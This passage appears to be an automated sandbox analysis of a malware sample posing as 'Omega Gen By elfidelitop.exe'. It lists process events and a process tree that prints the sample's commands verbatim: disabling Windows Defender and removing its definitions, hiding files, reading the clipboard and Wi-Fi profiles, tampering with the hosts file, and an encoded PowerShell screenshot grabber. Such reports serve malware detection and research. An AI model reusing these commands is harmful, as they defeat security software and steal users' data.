Token: SeSystemProfilePrivilege	2524	WMIC.exe
Token: SeSystemtimePrivilege	2524	WMIC.exe
Token: SeProfSingleProcessPrivilege	2524	WMIC.exe
Token: SeIncBasePriorityPrivilege	2524	WMIC.exe
Token: SeCreatePagefilePrivilege	2524	WMIC.exe
Token: SeBackupPrivilege	2524	WMIC.exe
Token: SeRestorePrivilege	2524	WMIC.exe
Token: SeShutdownPrivilege	2524	WMIC.exe
Token: SeDebugPrivilege	2524	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2524	WMIC.exe
Token: SeRemoteShutdownPrivilege	2524	WMIC.exe
Token: SeUndockPrivilege	2524	WMIC.exe
Token: SeManageVolumePrivilege	2524	WMIC.exe
Token: 33	2524	WMIC.exe
Token: 34	2524	WMIC.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3556	OneDrive.exe
3556	OneDrive.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
3556	OneDrive.exe
3556	OneDrive.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3556	OneDrive.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3996 wrote to memory of 4440	3996	Omega Gen By elfidelitop.exe	77
PID 3996 wrote to memory of 4440	3996	Omega Gen By elfidelitop.exe	77
PID 4440 wrote to memory of 5004	4440	Omega Gen By elfidelitop.exe	78
PID 4440 wrote to memory of 5004	4440	Omega Gen By elfidelitop.exe	78
PID 4440 wrote to memory of 3912	4440	Omega Gen By elfidelitop.exe	79
PID 4440 wrote to memory of 3912	4440	Omega Gen By elfidelitop.exe	79
PID 4440 wrote to memory of 2552	4440	Omega Gen By elfidelitop.exe	80
PID 4440 wrote to memory of 2552	4440	Omega Gen By elfidelitop.exe	80
PID 4440 wrote to memory of 3832	4440	Omega Gen By elfidelitop.exe	84
PID 4440 wrote to memory of 3832	4440	Omega Gen By elfidelitop.exe	84
PID 4440 wrote to memory of 1304	4440	Omega Gen By elfidelitop.exe	86
PID 4440 wrote to memory of 1304	4440	Omega Gen By elfidelitop.exe	86
PID 3912 wrote to memory of 4544	3912	cmd.exe	88
PID 3912 wrote to memory of 4544	3912	cmd.exe	88
PID 5004 wrote to memory of 2332	5004	cmd.exe	89
PID 5004 wrote to memory of 2332	5004	cmd.exe	89
PID 2552 wrote to memory of 3952	2552	cmd.exe	90
PID 2552 wrote to memory of 3952	2552	cmd.exe	90
PID 3832 wrote to memory of 4956	3832	cmd.exe	91
PID 3832 wrote to memory of 4956	3832	cmd.exe	91
PID 1304 wrote to memory of 2788	1304	cmd.exe	92
PID 1304 wrote to memory of 2788	1304	cmd.exe	92
PID 4440 wrote to memory of 3708	4440	Omega Gen By elfidelitop.exe	94
PID 4440 wrote to memory of 3708	4440	Omega Gen By elfidelitop.exe	94
PID 3708 wrote to memory of 4260	3708	cmd.exe	96
PID 3708 wrote to memory of 4260	3708	cmd.exe	96
PID 4440 wrote to memory of 1108	4440	Omega Gen By elfidelitop.exe	97
PID 4440 wrote to memory of 1108	4440	Omega Gen By elfidelitop.exe	97
PID 1108 wrote to memory of 2816	1108	cmd.exe	99
PID 1108 wrote to memory of 2816	1108	cmd.exe	99
PID 4440 wrote to memory of 3328	4440	Omega Gen By elfidelitop.exe	100
PID 4440 wrote to memory of 3328	4440	Omega Gen By elfidelitop.exe	100
PID 3328 wrote to memory of 2524	3328	cmd.exe	102
PID 3328 wrote to memory of 2524	3328	cmd.exe	102
PID 4440 wrote to memory of 1984	4440	Omega Gen By elfidelitop.exe	103
PID 4440 wrote to memory of 1984	4440	Omega Gen By elfidelitop.exe	103
PID 1984 wrote to memory of 3592	1984	cmd.exe	105
PID 1984 wrote to memory of 3592	1984	cmd.exe	105
PID 4440 wrote to memory of 2436	4440	Omega Gen By elfidelitop.exe	106
PID 4440 wrote to memory of 2436	4440	Omega Gen By elfidelitop.exe	106
PID 4440 wrote to memory of 240	4440	Omega Gen By elfidelitop.exe	108
PID 4440 wrote to memory of 240	4440	Omega Gen By elfidelitop.exe	108
PID 2436 wrote to memory of 3408	2436	cmd.exe	110
PID 2436 wrote to memory of 3408	2436	cmd.exe	110
PID 240 wrote to memory of 4100	240	cmd.exe	111
PID 240 wrote to memory of 4100	240	cmd.exe	111
PID 4440 wrote to memory of 3064	4440	Omega Gen By elfidelitop.exe	112
PID 4440 wrote to memory of 3064	4440	Omega Gen By elfidelitop.exe	112
PID 4440 wrote to memory of 3200	4440	Omega Gen By elfidelitop.exe	113
PID 4440 wrote to memory of 3200	4440	Omega Gen By elfidelitop.exe	113
PID 3200 wrote to memory of 3668	3200	cmd.exe	116
PID 3200 wrote to memory of 3668	3200	cmd.exe	116
PID 3064 wrote to memory of 3804	3064	cmd.exe	117
PID 3064 wrote to memory of 3804	3064	cmd.exe	117
PID 4440 wrote to memory of 3156	4440	Omega Gen By elfidelitop.exe	118
PID 4440 wrote to memory of 3156	4440	Omega Gen By elfidelitop.exe	118
PID 4440 wrote to memory of 1512	4440	Omega Gen By elfidelitop.exe	119
PID 4440 wrote to memory of 1512	4440	Omega Gen By elfidelitop.exe	119
PID 4440 wrote to memory of 3472	4440	Omega Gen By elfidelitop.exe	122
PID 4440 wrote to memory of 3472	4440	Omega Gen By elfidelitop.exe	122
PID 1512 wrote to memory of 2824	1512	cmd.exe	124
PID 1512 wrote to memory of 2824	1512	cmd.exe	124
PID 3156 wrote to memory of 4036	3156	cmd.exe	125
PID 3156 wrote to memory of 4036	3156	cmd.exe	125

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4500	attrib.exe
3292	attrib.exe
3408	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Omega Gen By elfidelitop.exe
"C:\Users\Admin\AppData\Local\Temp\Omega Gen By elfidelitop.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3996
- C:\Users\Admin\AppData\Local\Temp\Omega Gen By elfidelitop.exe
  "C:\Users\Admin\AppData\Local\Temp\Omega Gen By elfidelitop.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Omega Gen By elfidelitop.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Omega Gen By elfidelitop.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error', 0, 'Advertencia', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2552
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error', 0, 'Advertencia', 0+16);close()"
      4⤵
      PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3832
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1304
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3708
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1108
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3328
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:2524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1984
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Omega Gen By elfidelitop.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:2436
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Omega Gen By elfidelitop.exe"
      4⤵
      Views/modifies file attributes
      PID:3408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:240
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3064
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3200
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3156
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1512
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3472
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2840
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4624
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2316
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2732
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4460
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4532
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nlr5dc5q\nlr5dc5q.cmdline"
        5⤵
        
        PID:3884
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES784D.tmp" "c:\Users\Admin\AppData\Local\Temp\nlr5dc5q\CSCEF442DA451D74B6D827ACD5D26522C41.TMP"
        6⤵
        
        PID:2268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:780
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1572
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1212
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1804
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4052
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
